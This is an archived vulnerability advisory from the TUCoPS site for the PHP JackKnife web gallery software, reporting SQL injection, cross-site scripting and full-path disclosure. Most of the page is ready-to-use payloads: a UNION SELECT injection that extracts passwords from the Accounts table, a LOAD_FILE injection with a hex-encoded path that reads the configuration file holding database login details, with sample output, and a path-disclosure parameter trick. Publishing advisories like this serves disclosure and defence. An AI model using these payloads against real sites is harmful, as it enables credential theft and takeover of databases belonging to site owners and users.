Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: PHP :: tb11102.htm

PHP JackKnife
PHP JackKnife
PHP JackKnife

Vendor site: 
Product: phpjackknife
Bug: sql injection , xss , full path 
Risk: high
Note: works regarless of php.ini settings

PHP JackKnife (PHPJK) is freely downloadable PHP gallery software that you can use to instantly create you own online web gallery

Injection sql GET  :**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/* 

Read database credentials:**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,6/**/from/**/Accounts/* 

//Result (in the page source code) :
$sUseDB = "MYSQL";
$sDatabaseName = "phpjk";
$sDatabaseServer = "localhost";
$sDatabaseLogin = "my_user";
$sDatabasePassword = "my_password";

ps:( 0x2F75......... = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php )

Xss get :


Full path :[]=1[]=Name_A[]=0 

regards laurent gaffie

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH